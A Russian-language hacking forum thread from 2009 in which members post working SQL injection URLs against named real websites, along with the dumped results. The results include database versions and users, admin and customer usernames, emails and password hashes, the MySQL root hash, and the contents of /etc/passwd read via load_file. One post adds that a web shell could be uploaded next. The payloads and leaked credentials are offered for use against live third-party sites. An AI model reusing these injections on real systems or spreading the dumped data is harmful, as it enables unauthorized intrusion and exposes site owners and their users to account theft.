ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10571  
Старый 31.08.2009, 10:06
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

klinik-agropolitan.com - PR=3
http://klinik-agropolitan.com/links.php?id=1/**/anD/**/1=-1%20/**/uniON/**/aLl/**/seLEcT/**/1,password,version(),username,user(),database()/**/FROM/**/users
version - 5.0.81-community-log
user - klinikag_admin@localhost
database - klinikag_sozo
table - users (username. password)
 
Ответить с цитированием

  #10572  
Старый 31.08.2009, 10:40
Аватар для DrAssault
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
_ttp://www.greyhorse.ru/in/articles/article.php?id=-137+union+select+1,2,3,4,concat_ws(0x3a,uid,uname, pass,email,user_icq),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20+from+iw_users+limit+1+offset+2--
3:moder:f1c1592588411002af340cbaedd6fc33:toha@grey horse.ru:288826876

Цитата:
_ttp://www.greyhorse.ru/in/articles/article.php?id=-137+union+select+1,2,3,4,concat_ws(0x3a,uid,uname, pass,email,user_icq),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20+from+iw_users+limit+1+offset+3--
4:Leonid:ba954023e9ee590ab082b65b81b6b93d:sizov.le onid@list.ru
 
Ответить с цитированием

  #10573  
Старый 31.08.2009, 13:00
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

WAP дижок странного топа

http://tipik.ru/
version() - 5.0.51a-community-log
user() - gener123_top@localhost
database() - gener123_top
************
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,id,login,pass)+fro m+superadmin--

************
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+40,1--
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+60,1--
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+60,1--
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link ,pass)+from+users+limit+90,1--
и т.д.
************

Последний раз редактировалось jokester; 31.08.2009 в 15:48.. Причина: Хеши запрещены, вопросы в соседней теме
 
Ответить с цитированием

  #10574  
Старый 31.08.2009, 14:20
Аватар для DrAssault
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
_ttp://beauty4us.net/shop_display_products.php?cat_id=-1%20union%20select%20concat(email,0x3a,password),1 ,2,3,4,5,6,7%20from%20naxtor_cart_store_customer/*
wauler86@aol.com:e807f1fcf82d132f9bb018ca6738a19f

Последний раз редактировалось jokester; 31.08.2009 в 15:49..
 
Ответить с цитированием

  #10575  
Старый 31.08.2009, 15:26
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.oaktreeracing.com/season/events/event.php?id=-6+union+select+1,2,version(),4,5,6,7,8/*
Database Version: 4.1.22-log
Database name: oaktree
User name: oaktree@intrepid.select.net

---------------------------------------------------------------------------------------

Код:
http://www.weyerbacher.com/cwo.php?id=7&page_id=-14+union+select+1,version(),3,4/*
Database Version: 4.1.22-standard
Database name: weyerbach_cwo
User name: weyerbach_cwo@localhost

---------------------------------------------------------------------------------------------

Код:
http://www.oakcd.org.uk/page.php?id=-5+union+select+1,2,password,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,19+from+admin--
Database Version: 5.0.67-community
Database name: sccouk13_oak
User name: sccouk13_admin@localhost

--------------------------------------------------------------------------------------------------

Код:
http://www.oakmall.co.uk/shops.php?id=-46'+union+select+1,name,3,4,5,6,7,8,9,0,1,12+from+users/*
Database Version: 4.1.21
Database name: customers
User name: peter@localhost

----------------------------------------------------------------------------------------------------

Код:
http://www.arkells.com/pubs_more2.php?id=-648'+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,39+from+users/*
Database Version: 4.1.22
Database name: Arkells
User name: sw002db@localhost

---------------------------------------------------------------------------------------------------------
Код:
http://www.quickrepo.com/moreinfo.php?id=-14'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,34/*
Database Version: 4.1.22-log
Database name: quickrepo
User name: quickrepo@localhost

Последний раз редактировалось Skofield; 31.08.2009 в 17:14..
 
Ответить с цитированием

  #10576  
Старый 31.08.2009, 17:14
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.igpa.at/heim.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13
Код:
site89m2@localhost:usr_site89_2:5.0.51-log
 
Ответить с цитированием

  #10577  
Старый 31.08.2009, 17:31
Аватар для Skofield
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.ihs97.com/view_alumni.php?id=-125+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),1,2,3,4,5,16/*
4.1.22-max-log : ihs97 : ihs97@208.109.138.57
 
Ответить с цитированием

  #10578  
Старый 31.08.2009, 21:28
Аватар для DrAssault
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+file_priv,concat_ws(0x3a,user,passw ord),version()+from+mysql.user--
Yroot:*DB469070DB0AD0CA0B93040D166D7FC4713D6961
5.0.45

Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/passwd'),3+from+mysql.user--
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin clamav:x:100:103:Clam Anti Virus Checker:/var/clamav:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin avahi-autoipd:x:101:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin dodo-online:x:500:500::/mnt/sdb1/dodo-online:/bin/bash

Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3+from+mysql.user--
Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3+from+mysql.user+into+outfile+'/tmp/1.txt'--
Цитата:
_ttp://elkotob.com/news.php?id=-1+union+select+1,load_file('/tmp/1.txt'),3+from+mysql.user--
Ну и в таком же духе, впринципе ничё не мешает залить шелл...
 
Ответить с цитированием

Всем привет.
  #10579  
Старый 01.09.2009, 10:15
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию Всем привет.

http://www.bearingru.sibinfo.org/right.php?id1=-163+union+select+concat_ws(0x3a,version(),database (),user(),@@version_compile_os),2

Database Version: 5.0.83-log
Database name: sibinfo
User name: sibinfo1_org@localhost
Os: redhat-linux-gnu
 
Ответить с цитированием

  #10580  
Старый 01.09.2009, 12:36
Аватар для Swift
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

Код:
http://iri.iiu.edu.pk/index.php?page_id=9+union+select+1,2,3,4,5,concat(0x2,version(),user(),database()),7,8,9,10,11
5.0.45-community-ntrir2009rir@localhostiriportal
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ